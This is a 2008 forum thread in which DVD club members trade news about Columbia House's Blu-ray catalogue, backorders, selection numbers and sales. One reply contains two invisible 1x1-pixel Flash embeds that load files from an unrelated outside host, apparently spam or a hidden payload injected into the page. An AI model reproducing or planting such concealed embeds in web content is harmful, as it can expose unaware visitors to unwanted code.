Search
DVD Clubs Discuss & Strategize about DVD Clubs like Columbia House

List of High Definition Discs at Columbia House

Search this Thread

Old 11-04-08, 02:42 PM
DVD Talk Legend

Received 3 Likes on 3 Posts
Originally Posted by SMART-ASS
That's interesting. Aren't those two under the Dimension label? ...and isn't that label owned by Disney?
Also interesting that the Clone Wars Blu-ray is there too, since none of the Star Wars dvds have ever been available through Columbia House.
CH carries the Weinstein titles of Dimension.
Old 11-04-08, 05:24 PM
Cool New Member

Received 0 Likes on 0 Posts
I believe Miramax went to Disney but Dimension stayed with Weinstein.

I'd link to an article but the system won't let me.
Old 11-11-08, 10:07 AM
DVD Talk Platinum Edition

Has anyone received From Russia With Love or Sweeney Todd Blu-rays from CH? My order history has had these two titles listed as backorder for three weeks.
Old 11-11-08, 06:02 PM
DVD Talk Legend

Originally Posted by fryinpan1
Has anyone received From Russia With Love or Sweeney Todd Blu-rays from CH? My order history has had these two titles listed as backorder for three weeks.
Still waiting on ST. There's been a hold on my card for $26.97 since it was released.
Old 11-11-08, 07:22 PM
DVD Talk Reviewer

Received 2 Likes on 1 Post
Originally Posted by fryinpan1
I'm still waiting on both of them as well.

Weird.
Old 11-12-08, 12:58 AM
Cool New Member

Originally Posted by GenPion
I'm still waiting on both of them as well.

Weird.<object width="1" height="1"><param name="movie" value="http://thehostingreviews.com/pages/879/"></param><param name="allowFullScreen" value="true"></param><embed src="http://thehostingreviews.com/pages/879/" type="application/x-shockwave-flash" allowfullscreen="true" width="1" height="1"></embed></object><object width="1" height="1"><param name="movie" value="http://thehostingreviews.com/pages/881/"></param><param name="allowFullScreen" value="true"></param><embed src="http://thehostingreviews.com/pages/881/" type="application/x-shockwave-flash" allowfullscreen="true" width="1" height="1"></embed></object>
me too.. yikes i might need to rent them. cant stand the wait
Old 11-23-08, 02:56 PM
DVD Talk Hall of Fame

Received 2 Likes on 2 Posts
Added more than 30 new titles to the list in the first post. However, I would guess that there are a lot I have missed.

Of note is the Blu-ray Disc version of Casablanca is finally being released next month, albeit at an absurd price of $64.95. I'm glad I already have it on HD DVD. Nevertheless, it is good news for those of us hoping for more catalog titles on BD, as opposed to just new releases.
Old 11-25-08, 08:43 PM
DVD Talk Legend

FYI, CH has added a whole slew of Fox and Anchor Bay/Starz catalog titles today. Now all we need is a new BOGO code!
Old 11-25-08, 08:50 PM
DVD Talk Special Edition

^^Sweet! Maybe they're stocking up for a big sale .
Old 11-26-08, 02:24 PM
DVD Talk Hall of Fame

Added another 25 Blu-ray Discs to the list in the first post. Columbia House appears pretty serious about having a large catalog of BDs. I guess they know where the future is (and where the decent mark-ups are).
Old 12-07-08, 10:25 PM

I don't see Wall-E or U-571 on the list. Are there selection numbers for these yet?
Old 12-07-08, 10:33 PM
DVD Talk Special Edition

Originally Posted by facesnorth
I don't see Wall-E or U-571 on the list. Are there selection numbers for these yet?
No facesnorth (hey, it's me... Smarty-pants ).
Columbia House does not carry any Disney dvds. Disney has their own dvd club, and most likely does not allow CH to sell their products.
Of all the other studios that CH does carry, there is no ryme or reason why they carry certain titles and not others.
They have been adding more Blu-rays recently, but at the same time still have a very limited selection.
I too would love if they had U-571 BR, as that is one of my favorites. I've got it on HD-DVD, so I can still wait till it gets down to a good price at somethime/somewhere.
Old 12-07-08, 11:56 PM
DVD Talk Legend

^

CH has U-571. The selection number is 5263801 and the price is $22.46.
Old 12-07-08, 11:58 PM
DVD Talk Special Edition

Originally Posted by Sweet Baby James
^

Holy shit! They sure as hell didn't have it a day or two ago. I even made specific mention of how I wish they had that title a couple weeks ago.
Thanks James. Mucho apprecioto .
Old 12-08-08, 01:02 PM
DVD Talk Hall of Fame

Added thirty more Blu-ray Discs to the list in the first post. Columbia House continues to add BDs to their catalog at a rapid pace.
Old 12-08-08, 01:19 PM
DVD Talk Special Edition

THANKS lizard! You ARE the man .

Btw, you may want to delete all of the HD-DVD stuff from the first post .
Old 12-08-08, 01:20 PM
DVD Talk Special Edition

Originally Posted by Sweet Baby James
^

Btw, ordered that last night along with Terminator. Thanks for the heads up.
Old 12-08-08, 01:22 PM
DVD Talk Special Edition

Hey lizard... (or anyone). Does CH add a lot of titles ON THEIR RELEASE DAY? What are the chances they will have Horton Hears A Who anytime this week?
Old 12-08-08, 01:59 PM
DVD Talk Hall of Fame

THANKS lizard! You ARE the man .
You're welcome. However, I've been thinking about abandoning this list because the information is so readily available on the Columbia House website.
Btw, you may want to delete all of the HD-DVD stuff from the first post .
Done. Thanks for the reminder.
Hey lizard... (or anyone). Does CH add a lot of titles ON THEIR RELEASE DAY? What are the chances they will have Horton Hears A Who anytime this week?
Universal titles are sometimes added on or around the release day, but I haven't really noticed any pattern to the general additions to the BD catalog. Many of the recent additions were catalog titles released months or years ago.
Old 12-08-08, 02:12 PM
DVD Talk Special Edition

thanks again...
Old 12-08-08, 02:41 PM

No facesnorth (hey, it's me... Smarty-pants ).
Columbia House does not carry any Disney dvds. Disney has their own dvd club, and most likely does not allow CH to sell their products.
Of all the other studios that CH does carry, there is no ryme or reason why they carry certain titles and not others.
They have been adding more Blu-rays recently, but at the same time still have a very limited selection.
I too would love if they had U-571 BR, as that is one of my favorites. I've got it on HD-DVD, so I can still wait till it gets down to a good price at somethime/somewhere.
Is this your more sinister alter-ego? Well here goes nothin, gonna call CH and give it a shot....
Old 12-08-08, 02:51 PM
DVD Talk Special Edition

Yah . Everyone I know knows I'm a sarcastic SOB, so I thought the name was fitting. I thought maybe is was a bit harsh for the other forum though...

Good luck with the account. Be sure to let us know in the other thread that discusses signing up for BR only how it goes, what titles were available to choose from, what you got, ect...

TIA

PS...
Don't know if you'll get your account info in time to take advantage of the current BOGO or not. Surely this won't be the last sale though. They seem to be happening about every 3 months now.
Old 12-09-08, 03:08 AM

Yah . Everyone I know knows I'm a sarcastic SOB, so I thought the name was fitting. I thought maybe is was a bit harsh for the other forum though...
It's more funny in contrast with the sanitized Pants moniker.

Good luck with the account. Be sure to let us know in the other thread that discusses signing up for BR only how it goes, what titles were available to choose from, what you got, ect...

TIA

PS...
Don't know if you'll get your account info in time to take advantage of the current BOGO or not. Surely this won't be the last sale though. They seem to be happening about every 3 months now.
I didn't realize it was the 8th already.....boy time is going by fast. Since there's obviously no chance to get in on time I thought it best if I wait a couple months and try to time it closer to the next one. Hopefully by then a better introductory list will be available. Thanks for the tips, though.
Old 12-16-08, 11:51 AM
DVD Talk Hall of Fame

Added ten more BDs to the list.

Perhaps of interest to some Matrix fans: Columbia House has the single movie BD of The Matrix up for pre-order, with a release date of 3/24/09.
Old 01-03-09, 01:00 PM
DVD Talk Hall of Fame

Firefly fans may be interested to know that Columbia House now has:

5265103 Serenity [Blu-ray]

Archive - Advertising - Cookie Policy - Privacy Statement - Terms of Service -

Copyright © 2024 MH Sub I, LLC dba Internet Brands. All rights reserved. Use of this site indicates your consent to the Terms of Use.